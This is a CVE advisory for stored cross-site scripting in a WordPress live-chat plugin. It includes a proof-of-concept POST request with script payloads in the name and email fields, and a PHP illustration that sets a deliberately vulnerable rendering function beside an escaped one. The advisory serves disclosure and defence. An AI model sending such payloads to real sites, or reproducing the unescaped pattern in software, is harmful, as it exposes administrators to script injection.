CVE-2018-11105

[Suggested description]

There is stored cross site scripting in the wp-live-chat-support plugin before 8.0.08 for
WordPress via the "name" (aka wplc_name) and "email" (aka wplc_email) input fields
whenever a malicious attacker would initiate a new chat with an
administrator.
NOTE: this issue exists because of an incomplete fix for CVE-2018-9864.

[Additional Information]

The following POST request was used for leveraging the XSS attack:

```
POST /wp-json/wp_live_chat_support/v1/start_chat HTTP/1.1
...
header info
...
Connection: close

relay_action=wplc_new_chat&
security=<token>&
cid=<cid>&
wplc_name=<script>alert("evil payload in name");</script>&
wplc_email=<script>alert("evil payload in mail");</script>&
wplc_extra_data%5Bobject_switch%5D=1&
url=http%3A%2F%2Flocalhost%3A8000%2F&
session=<session>&
server_token=<token>&
token=<token>&_wpnonce=<nonce>
```

Note that the wplc_name and wplc_email parameters were the ones used to deliver the payload to the WordPress backend.

[Vulnerability Type]

Cross Site Scripting (XSS)

[Vendor of Product]

CodeCabin_ / WP-livechat

[Affected Product Code Base]

WP live chat support - All versions < 8.0.08

[Affected Component]

WP live chat support - all versions < 8.0.08

[Attack Type]

Remote

[CVE Impact Other]

Stored Cross Site Scripting

[Attack Vectors]

A malicious attacker that initiates a chat with an administrator can
abuse the "name" and "email" form fields presented by the
wp-live-chat plugin to inject malicious JavaScript. After the chat is
either ended or missed by the administrator, interaction with the
following pages will trigger the malicious JavaScript:

http://<target-url>/wp-admin/admin.php?page=wplivechat-menu-history
http://<target-url>/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id>

http://<target-url>/wp-admin/admin.php?page=wplivechat-menu-missed-chats
http://<target-url>/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id>
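The defect class behind both the request body above and the admin pages listed here is stored data (the visitor-supplied name and email) being rendered into administrator HTML without output encoding. The following PHP is an added illustration written for this write-up, not code from the wp-live-chat-support plugin: it models a stored chat row with the advisory's payload, shows a vulnerable rendering path next to a hardened one, and adds the input-side check that a valid email address can never contain HTML metacharacters. The record layout, the function names, and the `render_history_row_*` / `validate_start_chat_input` helpers are assumptions; `htmlspecialchars()` stands in for WordPress's `esc_html()` / `esc_attr()` so the snippet runs without WordPress loaded.

```php
<?php
// Added example for this write-up; not the plugin's own code.

// Constructed sample record standing in for a chat row stored by start_chat.
// The values are the payloads from the advisory's POST body.
$chat = [
    'cid'   => 42,
    'name'  => '<script>alert("evil payload in name");</script>',
    'email' => '<script>alert("evil payload in mail");</script>',
];

// Vulnerable rendering (assumed shape): stored values concatenated straight
// into the history/missed-chats table, so the stored script executes in the
// administrator's browser when the page loads.
function render_history_row_vulnerable(array $chat): string {
    return '<tr><td>' . $chat['cid'] . '</td>'
         . '<td>' . $chat['name'] . '</td>'
         . '<td><a href="mailto:' . $chat['email'] . '">' . $chat['email'] . '</a></td></tr>';
}

// Context-appropriate escaping. In a WordPress plugin use esc_html() for text
// nodes and esc_attr() for attribute values; htmlspecialchars() with ENT_QUOTES
// covers both contexts here because every attribute is double-quoted.
function esc_html_ctx(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened rendering: every untrusted field is escaped at the point of output,
// independent of whatever validation the start_chat endpoint performed.
function render_history_row_hardened(array $chat): string {
    $cid   = (int) $chat['cid'];            // numeric field: cast, do not trust
    $name  = esc_html_ctx($chat['name']);
    $email = esc_html_ctx($chat['email']);
    return "<tr><td>{$cid}</td><td>{$name}</td>"
         . "<td><a href=\"mailto:{$email}\">{$email}</a></td></tr>";
}

// Defence in depth on the input side (assumed helper): reject a name that
// contains HTML metacharacters and an email that does not parse as an address.
// Input filtering alone is not a fix; it complements output escaping.
function validate_start_chat_input(string $name, string $email): array {
    $errors = [];
    if ($name === '' || mb_strlen($name) > 100 || preg_match('/[<>]/', $name)) {
        $errors[] = 'name';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email';
    }
    return $errors;   // empty array means the submission is acceptable
}

// Reviewer check: does a raw <script tag survive in the rendered HTML?
function contains_raw_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

echo render_history_row_vulnerable($chat), PHP_EOL;
echo render_history_row_hardened($chat), PHP_EOL;
var_dump(contains_raw_script(render_history_row_vulnerable($chat)));
var_dump(contains_raw_script(render_history_row_hardened($chat)));
var_dump(validate_start_chat_input($chat['name'], $chat['email']));
```

Running the script prints the vulnerable row with the script tags intact, the hardened row with them encoded as `&lt;script&gt;` text, `true` then `false` from the reviewer check, and `["name", "email"]` from the input validator. The point the advisory's "incomplete fix" note makes is visible in the structure: the rendering of the history and missed-chats pages must escape every stored field regardless of what start_chat accepts, otherwise any field the input filter overlooks becomes a second stored XSS.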

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Riccardo ten Cate

[Reference]

https://github.com/RiieCco/write-ups/tree/master/CVE-2018-11105